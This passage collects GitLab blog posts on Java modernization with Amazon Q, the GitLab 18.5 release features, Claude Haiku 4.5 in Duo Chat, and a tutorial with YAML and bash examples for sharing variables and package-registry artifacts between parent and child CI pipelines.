First, create an issue in your GitLab project describing your modernization goal. You don't need to specify version details: GitLab Duo with Amazon Q can detect that your application is currently built with Java 8 and needs to be upgraded. Simply describe that you want to refactor your code to Java 17 in the issue title and description.

**Trigger the transformation**

Once your issue is created, invoke GitLab Duo with Amazon Q using the `/q transform` command in a comment on the issue. This simple command sets in motion an automated process that will analyze your entire codebase, create a comprehensive upgrade plan, and generate all necessary code changes.

**Automated analysis and implementation**

Behind the scenes, Amazon Q analyzes your Java 8 codebase to understand your application's structure, dependencies, and implementation patterns. It identifies deprecated features, determines which Java 17 constructs can replace existing code, and creates a merge request with all the necessary updates. The transformation updates not just your source code files — including CLI, GUI, and model classes — but also build configuration files like `pom.xml`, with Java 17 settings and dependencies.

**Review and verification**

The generated merge request provides a complete view of all changes. You can review how your code has been modernized with Java 17 language features and verify that all tests still pass. The beauty of this approach is that functionality is preserved: your application works exactly the same way, just with improved, more modern code.

## Why use GitLab Duo with Amazon Q

Leveraging GitLab Duo with Amazon Q for application modernization has a number of advantages for development teams:

**Time reduction**: What traditionally takes weeks of developer effort is reduced to hours or minutes, freeing your team to focus on building new features rather than managing technical debt.

**Minimized risk**: The automated analysis and transformation process reduces the risk of human error that often accompanies manual code migrations. Every change is traceable and reviewable through GitLab's merge request workflow.

**Complete audit trail**: Every transformation is documented through GitLab's version control, providing a clear record of what changed and why, which is essential for compliance and troubleshooting.

**Enterprise-grade security**: The integration leverages GitLab's end-to-end security features and AWS's robust cloud infrastructure, helping to ensure your code and data remain protected throughout the modernization process.

Are you ready to see GitLab Duo with Amazon Q in action?
Watch our complete walkthrough video demonstrating the Java modernization process from start to finish:

<figure class="video_container">
  <iframe src="https://www.youtube.com/embed/qGyzG9wTsEo?si=47JnSb6flOgZAJcR" frameborder="0" allowfullscreen="true"></iframe>
</figure>

> To learn more about GitLab Duo with Amazon Q, visit our website or reach out to your GitLab representative.

## Read more

* Agentic AI guides and resources
* GitLab Duo with Amazon Q: DevSecOps meets agentic AI
* More GitLab Duo with Amazon Q tutorials
about.gitlab.com
October 30, 2025 at 10:14 PM
GitLab 18.5: Intelligence that moves software development forward
Software development teams are drowning in noise. Thousands of vulnerabilities flood security dashboards, but only a fraction pose real risk. Developers context-switch between planning backlogs, triaging security findings, reviewing code, and responding to CI/CD failures — losing hours to manual work. GitLab 18.5 calms this chaos.

At the heart of this release is a valuable improvement in the overall usability of GitLab and in how AI integrates into your user experience. A new panel-based UI makes it easier to see data in context and allows GitLab Duo Chat to be persistently visible across the platform, wherever it is needed. Purpose-built agents tackle vulnerability triage and backlog management, and popular AI tools integrate with agentic workflows even more seamlessly than before. We've also extended our market-leading security capabilities to help you better identify exploitable vulnerabilities versus theoretical ones, distinguish active credentials from expired ones, and scan only changed code to keep developers in flow.

## What's new in 18.5

18.5 represents our biggest release so far this year — watch our introduction to the release, and read more details below.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1128975773?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab_18.5 Release_101925_MP_v2"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

### Modern user experience with quick access to GitLab Duo everywhere

GitLab 18.5 delivers a modernized user experience with a more intuitive interface driven by a new panel-based layout. With panels, key information appears side by side so that you can work contextually, without losing your place. For example, when you click on an issue in the issues list, its details automatically open in a side panel. You can also launch the GitLab Duo panel on the right, bringing Duo wherever you are in GitLab. This lets you ask contextual questions or give instructions right alongside your work.

Several usability improvements make navigation easier. The global search box now appears at the top center for improved accessibility. Global navigation elements, including Issues, Merge Requests, To-Dos, and your avatar, have moved to the top right. Additionally, the left sidebar is now collapsible and expandable, giving you more control over your workspace.

Teams using experimental and GitLab Duo beta features will be the first to receive the new interface, followed by all GitLab.com users, who will be able to turn the experience on using the toggle located under their user icon. To learn more about this feature, reference our documentation here. Please share your feedback or report any issues here; you're helping us shape a better GitLab!

### Updates to GitLab Duo Agent Platform

**Security Analyst Agent: Transform manual vulnerability triage into intelligent automation**

GitLab Duo Security Analyst Agent automates vulnerability management workflows through AI-powered analysis, helping transform hours of manual triage into intelligent automation.
Building on the Vulnerability Management Tools available through GitLab Duo Agentic Chat, Security Analyst Agent orchestrates multiple tools, applies security policies, and automatically creates custom flows for recurring workflows. Security teams can access enriched vulnerability data, including CVE details, static reachability analysis, and code flow information, while executing operations like dismissing false positives, confirming threats, adjusting severity levels, and creating linked issues for remediation — all through conversational AI.

The agent reduces repetitive clicking through vulnerability dashboards and replaces custom scripts with simple natural language commands. For example, when a security scan reveals dozens of vulnerabilities, simply prompt: "Dismiss vulnerabilities with reachable=FALSE and create issues for critical findings." Security Analyst Agent analyzes reachability data, applies security policies, and completes bulk operations in moments — helping decrease work that would otherwise take hours.

While individual Vulnerability Management Tools can be accessed directly through Agentic Chat for specific tasks, Security Analyst Agent orchestrates these tools intelligently and automates complex multi-step workflows. Note that Vulnerability Management Tools are available through Agentic Chat on GitLab Self-Managed and GitLab.com instances. Security Analyst Agent is available on GitLab.com only for 18.5; availability in Self-Managed and Dedicated environments will come with our next release.

Watch this demo:

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1128975984?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="18.5 Security Demo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

**GitLab Duo Planner: Turn backlog chaos into strategic clarity**

Managing complex software delivery requires constant context-switching between planning tasks. GitLab Duo Planner addresses the real-world planning challenges we see teams face every day. Duo Planner acts as your teammate with awareness of your project context, including how you manage issues, epics, and merge requests. Unlike generic AI assistants, it's purpose-built with deep knowledge of GitLab's planning workflows, coupled with Agile and prioritization frameworks, to help you balance effort, risk, and strategic alignment.

GitLab Duo Planner can turn vague ideas into structured planning hierarchies, identify stale backlog items, and draft executive updates. For example, when refining a backlog with hundreds of issues accumulated over months, simply prompt: "Identify stale backlog items and suggest priorities." Within seconds, you'll receive a structured summary showing issues without recent activity, items missing key details, duplicate work, and recommended priorities based on labels and milestones, complete with actionable recommendations.

For teams managing complex roadmaps, the Planner aims to eliminate hours of manual analysis and context-switching, helping product managers and engineering leads make faster, more informed decisions. As of 18.5, GitLab Duo Planner is "read-only," meaning that it can analyze, plan, and suggest, but cannot yet take direct action to modify anything.
Please see our documentation for more information.

**Extensible Agent Catalog: Popular AI tools as native GitLab agents**

GitLab 18.5 introduces popular AI agents directly into the AI Catalog, making external tools like Claude, OpenAI Codex, Google Gemini CLI, Amazon Q Developer, and OpenCode available as native GitLab agents. Users can now discover, configure, and deploy these agents through the same unified catalog interface used for GitLab's built-in agents, with automatic syncing of foundational agents across organization catalogs. This eliminates the complexity of manual agent setup by providing a point-and-click catalog experience while maintaining enterprise-grade security through GitLab's authentication and audit systems.

GitLab Duo Enterprise subscriptions now include built-in usage of Claude and Codex within GitLab, allowing you to use your existing GitLab subscription for these tools without separate API keys or additional billing setup. Other agents may still require separate subscriptions and configuration while we finalize our integration plans.

**Self-hosted GitLab Duo Agent Platform (Beta): Address data sovereignty requirements without sacrificing AI power**

GitLab 18.5 moves GitLab Duo Agent Platform's self-hosted capabilities from experimental to beta, enabling organizations to execute AI agents and flows entirely within their own infrastructure — critical for regulated industries and data sovereignty requirements. The beta release includes improved timeout configurations and AI Gateway settings, allowing teams to use AI agents for code reviews, bug fixes, and feature implementations, while providing enterprise-grade security for sensitive code.

## Smarter, faster security: Prioritize real risks and keep developers in the flow

GitLab 18.5 introduces new application security capabilities that help teams focus on exploitable risk, reduce noise, and strengthen software supply chain security. These updates continue our commitment to building security directly into the development process — delivering precision, speed, and insight without disrupting developer flow.

**Static Reachability Analysis**

With over 37,000 new CVEs issued this year, security teams face an overwhelming volume of vulnerabilities and struggle to understand which ones are truly exploitable. Static Reachability Analysis, now in limited availability, brings library-level precision by helping to identify whether vulnerable code is actually invoked in your application, not just present in dependencies. Paired with our recently released Exploit Prediction Scoring System (EPSS) and Known Exploited Vulnerability (KEV) data, security teams can more effectively accelerate vulnerability triage and prioritize real risks to help strengthen overall supply chain security. In 18.5, we're adding support for Java, alongside existing support for Python, JavaScript, and TypeScript.

**Secret Validity Checks**

Just as Static Reachability Analysis helps teams prioritize exploitable vulnerabilities from open source dependencies, Secret Validity Checks bring the same insight to exposed secrets — currently available in beta on GitLab.com and GitLab Self-Managed. For GitLab-issued security tokens, instead of requiring you to manually verify whether a leaked credential or API key is active, GitLab automatically distinguishes active secrets from expired ones directly in the Vulnerability Report. This helps security and development teams focus remediation efforts on genuine risks.
Support for AWS- and GCP-issued secrets is planned for future releases.

**Custom rules for Advanced SAST**

Advanced SAST runs on rules informed by our in-house security research team, designed to maximize accuracy out of the box. However, some teams require additional flexibility to tune the SAST engine for their specific organization. With custom rules for Advanced SAST, AppSec teams can define atomic, pattern-based detection logic to capture security issues specific to their organization — like flagging banned function calls — while still using GitLab's curated ruleset as the baseline. Customizations are managed through simple TOML files, just like other SAST ruleset configurations. While these rules do not support taint analysis, they give organizations greater flexibility in achieving accurate SAST results.

**Advanced SAST C and C++ language support**

We're expanding language coverage for Advanced SAST to include C and C++, two languages widely used in embedded systems development. To enable scanning, projects must generate a compilation database that captures the compiler commands and include paths used during builds. This ensures the scanner can accurately parse and analyze source files, delivering precise, context-aware results that help security teams identify real vulnerabilities during development. C and C++ support requires specific configuration, which is detailed in our documentation, and is currently available in beta.

**Diff-based SAST scanning**

Traditional SAST scans re-analyze entire codebases with every commit, slowing pipelines and disrupting developer flow. The developer experience is a critical consideration that can make or break the adoption of application security testing. Diff-based SAST scanning speeds up scan times by focusing only on the code changed in a merge request, reducing redundant analysis and surfacing results relevant to the developer's work. By aligning scans with actual code changes, GitLab delivers faster, more focused feedback that helps keep developers in flow while maintaining strong security coverage.

## Simplify API configurations

API-driven workflows offer power and flexibility, but they can also create unnecessary complexity for tasks that teams need to perform regularly. The new Maven Virtual Registry interface brings a UI layer to these operations.

### Maven Virtual Registry interface

The new web-based interface for managing Maven virtual registries turns complex API configurations into visual simplicity, providing a more intuitive experience for package administrators and platform engineers. Previously, teams configured and maintained virtual registries only through API calls, which made routine maintenance time-consuming and required specialized platform knowledge. The new interface removes that barrier, making everyday tasks faster and easier.

With this update, you can now:

* Create virtual registries to simplify dependency configuration
* Create and order upstreams to help improve performance and compliance
* Browse and clear stale cache entries directly in the UI

This visual experience helps reduce operational overhead and gives development teams clearer insight into how dependencies are resolved, enabling better decisions about build performance and security policies.
Watch a demo:

<figure class="video_container">
  <iframe src="https://www.youtube.com/embed/CiOZJPhAvaI?si=cYaoR_OIgqFKbyM2" frameborder="0" allowfullscreen="true"></iframe>
</figure>

We invite enterprise customers to join the Maven Virtual Registry beta program and share feedback to help shape the final release.

## AI that adapts to your workflow

This release represents more than new capabilities — it's about choice and control. Watch the walkthrough video here:

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1128992281?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="18.5-tech-demo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

GitLab Premium and Ultimate users can start using these capabilities today on GitLab.com and self-managed environments, with availability for GitLab Dedicated customers planned for next month. GitLab Duo Agent Platform is currently in **beta** — enable beta and experimental features to experience how full-context AI can transform the way your teams build software.

New to GitLab? Start your free trial and see why the future of development is AI-powered, secure, and orchestrated through the world's most comprehensive DevSecOps platform.

_**Note:** Platform capabilities that are in beta are available as part of the GitLab Beta program. They are free to use during the beta period, and when generally available, they will be made available with a paid add-on option for GitLab Duo Agent Platform._

### Stay up to date with GitLab

To make sure you're getting the latest features, security updates, and performance improvements, we recommend keeping your GitLab instance up to date. The following resources can help you plan and complete your upgrade:

* Upgrade Path Tool – enter your current version and see the exact upgrade steps for your instance
* Upgrade Documentation – detailed guides for each supported version, including requirements, step-by-step instructions, and best practices

By upgrading regularly, you'll ensure your team benefits from the newest GitLab capabilities and remains secure and supported.

For organizations that want a hands-off approach, consider GitLab's Managed Maintenance service. With Managed Maintenance, your team stays focused on innovation while GitLab experts keep your Self-Managed instance reliably upgraded, secure, and ready to lead in DevSecOps. Ask your account manager for more information.

_This blog post contains "forward‑looking statements" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption "Risk Factors" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law._
about.gitlab.com
October 30, 2025 at 10:14 PM
Claude Haiku 4.5 now available in GitLab Duo Agentic Chat
GitLab now offers Claude Haiku 4.5, Anthropic's fastest model combining high intelligence with exceptional speed, directly in the GitLab Duo model selector. Users have the flexibility to choose Claude Haiku 4.5 alongside other leading models, enhancing their GitLab Duo experience with near-frontier performance at remarkable speed. With strong performance on SWE-bench Verified (73.3%) and more than 2x the speed of Claude Sonnet 4.5, GitLab users can apply Claude Haiku 4.5 to accelerate their development workflows with rapid, intelligent responses.

## GitLab Duo Agent Platform + Claude Haiku 4.5

GitLab Duo Agent Platform extends the value of Claude Haiku 4.5 by enabling multi-agent orchestration, where Claude Haiku 4.5 can serve as a fast sub-agent executing parallel tasks while more powerful models handle high-level planning. This combination creates efficient agentic workflows, where speed meets intelligence across the software development lifecycle. The result is faster iterations, cost-effective AI assistance, and responsive experiences, all delivered inside the GitLab workflow developers already use every day.

## Where you can use Claude Haiku 4.5

Claude Haiku 4.5 is now available as a model option in GitLab Duo Agent Platform Agentic Chat on GitLab.com. You can choose Claude Haiku 4.5 from the model selection dropdown to leverage its speed and coding capabilities for your development tasks.

**Note:** The ability to select Claude Haiku 4.5 in supported IDEs will be available soon.

Key capabilities:

* **Superior coding performance:** Achieves 73.3% on SWE-bench Verified, matching the intelligence level of models that were cutting-edge just months ago.
* **Lightning-fast responses:** More than 2x faster than Sonnet 4.5, perfect for real-time pair programming.
* **Enhanced computer use:** Outperforms Claude Sonnet 4 at autonomous task execution.
* **Context awareness:** The first Haiku model with native context window tracking for better task persistence.
* **Extended thinking:** Pauses to reason through complex problems before generating responses.

## Get started today

GitLab Duo Pro and Enterprise customers can access Claude Haiku 4.5 today. Visit our documentation to learn more about GitLab Duo capabilities and models. Questions or feedback? Share your experience with us through the GitLab community.

> Want to try GitLab Ultimate with Duo Enterprise? Sign up for a free trial today.

## Read more

* Greater AI choice in GitLab Duo: Claude Sonnet 4.5 arrives
* GitLab 18.4: AI-native development with automation and insight
* GitLab Duo Chat gets agentic AI makeover
about.gitlab.com
October 30, 2025 at 10:14 PM
Variable and artifact sharing in GitLab parent-child pipelines
Software projects have different evolving needs and requirements. Some have said that _software is never finished, merely abandoned_. Some software projects are small and others are large with complex integrations. Some have dependencies on external projects, while others are self-contained. Regardless of the size and complexity, the need to validate and ensure functionality remains paramount.

CI/CD pipelines can help with the challenge of building and validating software projects consistently but, much like the software itself, these pipelines can become complex with many dependencies. This is where ideas like parent-child pipelines and data exchange in CI/CD setups become incredibly important. In this article, we will cover common CI/CD data exchange challenges users may encounter with parent-child pipelines in GitLab — and how to solve them. You'll learn how to turn complex CI/CD processes into more manageable setups.

## Using parent-child pipelines

Consider a scenario where a project requires a large, complex pipeline. The whole project resides in one repository and contains different modules, and each module requires its own set of build and test automation steps. One approach to the CI/CD configuration in a scenario like this is to break down the larger pipeline into smaller ones (i.e., child pipelines) and keep a common CI/CD process, shared across all modules, in charge of the whole orchestration (i.e., the parent pipeline).

The parent-child pipeline pattern allows a single pipeline to orchestrate one or many downstream pipelines. Similar to how a single pipeline coordinates the execution of multiple jobs, the parent pipeline coordinates the running of full pipelines with one or more jobs. This pattern has been shown to be helpful in a variety of use cases:

* Breaking down large, complex pipelines into smaller, manageable pieces
* Conditionally executing certain pipelines as part of a larger CI/CD process
* Executing pipelines in parallel
* Helping manage user permissions to access and run certain pipelines

GitLab's current CI/CD structure supports this pattern and makes it simple to implement parent-child pipelines. While there are many benefits to using the parent-child pipeline pattern with GitLab, one question we often get is how to share data between the parent and child pipelines. In the next sections, we'll go over how to use GitLab variables and artifacts to address this concern.

### Sharing variables

There are cases where it is necessary to pass the output from a parent pipeline job to a child pipeline. These outputs can be shared as variables, artifacts, and inputs. Consider a case where we create a custom variable `var_1` during the runtime of a job:

```yaml
stages:
  - build
  - triggers

# This job only creates a variable
create_var_job:
  stage: build
  script:
    - var_1="Hi, I'm a Parent pipeline variable"
    - echo "var_1=$var_1" >> var.env
  artifacts:
    reports:
      dotenv: var.env
```

Notice that the variable is created as part of the script steps in the job (during runtime). In this example, we are using a simple string, `"Hi, I'm a Parent pipeline variable"`, to illustrate the main syntax required to later share this variable with a child pipeline.
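For reference, after `create_var_job` runs, the `var.env` file it uploads contains a single line in dotenv format, which GitLab parses back into a CI/CD variable for downstream jobs:

```
var_1=Hi, I'm a Parent pipeline variable
```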
Let's break down `create_var_job` and analyze the main steps of this GitLab job. First, we need to save `var_1` in dotenv format:

```yaml
script:
  - var_1="Hi, I'm a Parent pipeline variable"
  - echo "var_1=$var_1" >> var.env
```

After saving `var_1` into `var.env`, the next important step is to make this variable available as an artifact produced by `create_var_job`. To do that, we use the following syntax:

```yaml
artifacts:
  reports:
    dotenv: var.env
```

Up to this point, we have created a variable during runtime and saved it as a `dotenv` report. Now let's add the job that should trigger the child pipeline:

```yaml
telco_service_a:
  stage: triggers
  trigger:
    include: service_a/.gitlab-ci.yml
  rules:
    - changes:
        - service_a/*
```

The goal of the `telco_service_a` job is to find the `.gitlab-ci.yml` configuration of the child pipeline, defined in this case under `service_a/`, and trigger its execution. Let's examine this job:

```yaml
telco_service_a:
  stage: triggers
  trigger:
    include: service_a/.gitlab-ci.yml
```

We see it belongs to another `stage` of the pipeline, named `triggers`. This job will run only after `create_var_job`, the first-stage job that creates the variable `var_1` we want to pass, finishes successfully.

After defining the stage, we use the reserved keywords `trigger` and `include` to tell GitLab where to search for the child pipeline configuration, as illustrated in the YAML below:

```yaml
trigger:
  include: service_a/.gitlab-ci.yml
```

For this example, our child pipeline's YAML configuration lives at `service_a/.gitlab-ci.yml` in the GitLab repository.

<center><i>Child pipelines folders with configurations</i></center>

Take into consideration that the repository structure depicted above can vary. What matters is properly pointing the `trigger: include` properties at the location of your child pipeline configuration in your repository.

Finally, we use `rules: changes` to indicate to GitLab that this child pipeline should be triggered only if any file in the `service_a/` directory changes, as illustrated in the following code snippet:

```yaml
rules:
  - changes:
      - service_a/*
```

Using this rule helps optimize cost by triggering the child pipeline only when necessary. This approach is particularly valuable in a monorepo architecture, where specific modules contain numerous components, allowing us to avoid running their dedicated pipelines when no changes have been made to their respective codebases.

#### Configuring the parent pipeline

Up to this point, we have put together our parent pipeline. Here's the full code snippet for this segment:

```yaml
# Parent Pipeline Configuration
# This pipeline creates a custom variable and triggers a child pipeline
stages:
  - build
  - triggers

create_var_job:
  stage: build
  script:
    - var_1="Hi, I'm a Parent pipeline variable"
    - echo "var_1=$var_1" >> var.env
  artifacts:
    reports:
      dotenv: var.env

telco_service_a:
  stage: triggers
  trigger:
    include: service_a/.gitlab-ci.yml
  rules:
    - changes:
        - service_a/*
```

When GitLab executes this YAML configuration, the parent pipeline is rendered in the GitLab UI with a "trigger job" label, which indicates that this job will start the execution of another pipeline configuration.

#### Configuring the child pipeline

Moving on, let's now focus on the child pipeline configuration, where we expect to inherit and print the value of the `var_1` variable created in the parent pipeline.
#### Configuring the child pipeline

Moving forward, let's now focus on the child pipeline configuration, where we expect to inherit and print the value of the `var_1` variable created in the parent pipeline. The pipeline configuration in `service_a/.gitlab-ci.yml` has the following definition:

```yaml
stages:
  - build

build_a:
  stage: build
  script:
    - echo "this job inherits the variable from the Parent pipeline:"
    - echo $var_1
  needs:
    - project: gitlab-da/use-cases/7-4-parent-child-pipeline
      job: create_var_job
      ref: main
      artifacts: true
```

Like before, let's break down this pipeline and highlight the main parts needed to achieve our goal. This pipeline contains only one stage (i.e., `build`) and one job (i.e., `build_a`). The script in the job contains two steps:

```yaml
build_a:
  stage: build
  script:
    - echo "this job inherits the variable from the Parent pipeline:"
    - echo $var_1
```

These two steps print output during the execution. The most interesting one is the second step, `echo $var_1`, where we expect to print the variable value inherited from the parent pipeline. Remember, this was a simple string with the value `"Hi, I'm a Parent pipeline variable"`.

#### Inheriting variables using needs

To set up and link this job to inherit variables from the parent pipeline, we use the reserved GitLab CI keyword `needs`, as depicted in the following snippet:

```yaml
needs:
  - project: gitlab-da/use-cases/7-4-parent-child-pipeline
    job: create_var_job
    ref: main
    artifacts: true
```

Using the `needs` keyword, we define dependencies that must be completed before running this job. In this case, we pass four different values. Let's walk through each one of them:

* **project:** The complete namespace of the project where the main `gitlab-ci.yml` containing the parent pipeline YAML is located. Make sure to include the absolute path.
* **job:** The specific job name in the parent pipeline from which we want to inherit the variable.
* **ref:** The name of the branch where the main `gitlab-ci.yml` containing the parent pipeline YAML is located.
* **artifacts:** A boolean value indicating that artifacts from the parent pipeline job should be downloaded and made available to this child pipeline job.

**Note:** This specific approach using the `needs` property is only available to GitLab Premium and Ultimate users. We will cover another example for GitLab community users later on.

#### Putting it all together

Now let's assume we make a change to any of the files under the `service_a` folder and commit the changes to the repository. When GitLab detects the change, the rule we set up will trigger the child pipeline execution. This gets displayed in the GitLab UI as follows:

Clicking on `telco_service_a` will take us to the jobs in the child pipeline:

We can see the parent-child relationship and, finally, by clicking on the `build_a` job, we can visually verify the variable inheritance in the job execution log:

This output confirms the behavior we expected. The custom runtime variable `var_1` created in the parent job is inherited in the child job and unpacked from the `dotenv` report, and its value is accessible, as can be confirmed in line 26 of the log above.

This use case illustrates how to share custom variables, which can contain any value, between pipelines. The example is intentionally simple and can be extrapolated to more realistic scenarios. Take, for instance, the following CI/CD configuration, where the custom variable we need to share is the tag of a Docker image:

```yaml
# Pipeline
build-prod-image:
  tags: [ saas-linux-large-amd64 ]
  image: docker:20.10.16
  stage: build
  services:
    - docker:20.10.16-dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t $PRODUCTION_IMAGE .
    - docker push $PRODUCTION_IMAGE
    - echo "UPSTREAM_CONTAINER_IMAGE=$PRODUCTION_IMAGE" >> prodimage.env
  artifacts:
    reports:
      dotenv: prodimage.env
  rules:
    - if: '$CI_COMMIT_BRANCH == "main"'
      when: always
    - when: never
```
And then use the variable containing the Docker image tag in another job that updates a Helm manifest file:

```yaml
update-helm-values:
  stage: update-manifests
  image:
    name: alpine:3.16
    entrypoint: [""]
  before_script:
    - apk add --no-cache git curl bash yq
    - git remote set-url origin https://${CI_USERNAME}:${GITOPS_USER}@${SERVER_PATH}/${PROJECT_PATH}
    - git config --global user.email "[email protected]"
    - git config --global user.name "GitLab GitOps"
    - git pull origin main
  script:
    - cd src
    - echo $UPSTREAM_CONTAINER_IMAGE
    - yq eval -i ".spec.template.spec.containers[0].image |= \"$UPSTREAM_CONTAINER_IMAGE\"" store-deployment.yaml
    - cat store-deployment.yaml
    - git pull origin main
    - git checkout -B main
    - git commit -am '[skip ci] prod image update'
    - git push origin main
  needs:
    - project: gitlab-da/use-cases/devsecops-platform/simply-find/simply-find-front-end
      job: build-prod-image
      ref: main
      artifacts: true
```

Mastering how to share variables between pipelines while maintaining the relationship between them enables us to create more sophisticated workflow orchestration that can meet our software-building needs.

### Using GitLab Package Registry to share artifacts

While the `needs` feature mentioned above works great for Premium and Ultimate users, GitLab also has features to help achieve similar results for Community Edition users. One suggested approach is to store artifacts in the GitLab Package Registry.

Using a combination of the variables provided in GitLab CI/CD jobs and the GitLab API, you can upload artifacts to the GitLab Package Registry from a parent pipeline. In the child pipeline, you can then use the same variables and API to access the uploaded artifact from the package registry. Let's take a look at the example pipeline and some supplementary scripts that illustrate this:

**gitlab-ci.yml (parent pipeline)**

```yaml
# Parent Pipeline Configuration
# This pipeline creates an artifact, uploads it to the Package Registry, and triggers a child pipeline
stages:
  - create-upload
  - trigger

variables:
  PACKAGE_NAME: "pipeline-artifacts"
  PACKAGE_VERSION: "$CI_PIPELINE_ID"
  ARTIFACT_FILE: "artifact.txt"

# Job 1: Create and upload artifact to Package Registry
create-and-upload-artifact:
  stage: create-upload
  image: alpine:latest
  before_script:
    - apk add --no-cache curl bash
  script:
    - bash scripts/create-artifact.sh
    - bash scripts/upload-to-registry.sh
  rules:
    - if: $CI_PIPELINE_SOURCE == "push"

# Job 2: Trigger child pipeline
trigger-child:
  stage: trigger
  trigger:
    include: child-pipeline.yml
    strategy: depend
  variables:
    PARENT_PIPELINE_ID: $CI_PIPELINE_ID
    PACKAGE_NAME: $PACKAGE_NAME
    PACKAGE_VERSION: $PACKAGE_VERSION
    ARTIFACT_FILE: $ARTIFACT_FILE
  rules:
    - if: $CI_PIPELINE_SOURCE == "push"
```

Note the `strategy: depend` setting on the trigger job: it makes the trigger job wait for the child pipeline to complete and mirror its status, rather than reporting success as soon as the child pipeline is created.

**child-pipeline.yml**

```yaml
# Child Pipeline Configuration
# This pipeline downloads the artifact from the Package Registry and processes it
stages:
  - download-process

variables:
  # These variables are passed from the parent pipeline
  PACKAGE_NAME: "pipeline-artifacts"
  PACKAGE_VERSION: "$PARENT_PIPELINE_ID"
  ARTIFACT_FILE: "artifact.txt"

# Job 1: Download and process artifact from Package Registry
download-and-process-artifact:
  stage: download-process
  image: alpine:latest
  before_script:
    - apk add --no-cache curl bash
  script:
    - bash scripts/download-from-registry.sh
    - echo "Processing downloaded artifact..."
    - cat $ARTIFACT_FILE
    - echo "Artifact processed successfully!"
```
**upload-to-registry.sh**

```bash
#!/bin/bash
set -e

# Configuration
PACKAGE_NAME="${PACKAGE_NAME:-pipeline-artifacts}"
PACKAGE_VERSION="${PACKAGE_VERSION:-$CI_PIPELINE_ID}"
ARTIFACT_FILE="${ARTIFACT_FILE:-artifact.txt}"

# Validate required variables
if [ -z "$CI_PROJECT_ID" ]; then
  echo "Error: CI_PROJECT_ID is not set"
  exit 1
fi

if [ -z "$CI_JOB_TOKEN" ]; then
  echo "Error: CI_JOB_TOKEN is not set"
  exit 1
fi

if [ -z "$CI_API_V4_URL" ]; then
  echo "Error: CI_API_V4_URL is not set"
  exit 1
fi

if [ ! -f "$ARTIFACT_FILE" ]; then
  echo "Error: Artifact file '$ARTIFACT_FILE' not found"
  exit 1
fi

# Construct the upload URL
UPLOAD_URL="${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/${PACKAGE_NAME}/${PACKAGE_VERSION}/${ARTIFACT_FILE}"

# Upload the file using curl
response=$(curl -w "%{http_code}" -o /tmp/upload_response.json \
  --header "JOB-TOKEN: $CI_JOB_TOKEN" \
  --upload-file "$ARTIFACT_FILE" \
  "$UPLOAD_URL")

if [ "$response" -eq 201 ]; then
  echo "Upload successful!"
else
  echo "Upload failed with HTTP code: $response"
  exit 1
fi
```

**download-from-registry.sh**

```bash
#!/bin/bash
set -e

# Configuration
PACKAGE_NAME="${PACKAGE_NAME:-pipeline-artifacts}"
PACKAGE_VERSION="${PACKAGE_VERSION:-$PARENT_PIPELINE_ID}"
ARTIFACT_FILE="${ARTIFACT_FILE:-artifact.txt}"

# Validate required variables
if [ -z "$CI_PROJECT_ID" ]; then
  echo "Error: CI_PROJECT_ID is not set"
  exit 1
fi

if [ -z "$CI_JOB_TOKEN" ]; then
  echo "Error: CI_JOB_TOKEN is not set"
  exit 1
fi

if [ -z "$CI_API_V4_URL" ]; then
  echo "Error: CI_API_V4_URL is not set"
  exit 1
fi

if [ -z "$PACKAGE_VERSION" ]; then
  echo "Error: PACKAGE_VERSION is not set"
  exit 1
fi

# Construct the download URL
DOWNLOAD_URL="${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/${PACKAGE_NAME}/${PACKAGE_VERSION}/${ARTIFACT_FILE}"

# Download the file using curl
response=$(curl -w "%{http_code}" -o "$ARTIFACT_FILE" \
  --header "JOB-TOKEN: $CI_JOB_TOKEN" \
  --fail-with-body \
  "$DOWNLOAD_URL")

if [ "$response" -eq 200 ]; then
  echo "Download successful!"
else
  echo "Download failed with HTTP code: $response"
  exit 1
fi
```

In this example, the parent pipeline uploads a file to the GitLab Package Registry by calling a script named `upload-to-registry.sh`. The script gives the artifact a name and version and constructs the API call to upload the file to the package registry. The parent pipeline authenticates with a `$CI_JOB_TOKEN` to push the `artifact.txt` file to the registry.

The child pipeline operates the same way as the parent pipeline, using a script to construct the API call to download the `artifact.txt` file from the package registry. It is also able to authenticate to the registry using the `$CI_JOB_TOKEN`.

Since the GitLab Package Registry is available to all GitLab users, it serves as a central location for storing and versioning artifacts. It is a great option for users working with many kinds of artifacts and needing to version artifacts for workflows even beyond CI/CD.
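Since the generic package registry stores whatever bytes you upload, one optional hardening step is to publish a checksum next to the artifact and verify it after download. Here is a minimal, hypothetical sketch in the same style as the scripts above; the `.sha256` file name is our own convention, not something GitLab requires:

```bash
#!/bin/bash
set -e

# Parent side: publish a checksum alongside the artifact
sha256sum "$ARTIFACT_FILE" > "${ARTIFACT_FILE}.sha256"
curl --fail --header "JOB-TOKEN: $CI_JOB_TOKEN" \
  --upload-file "${ARTIFACT_FILE}.sha256" \
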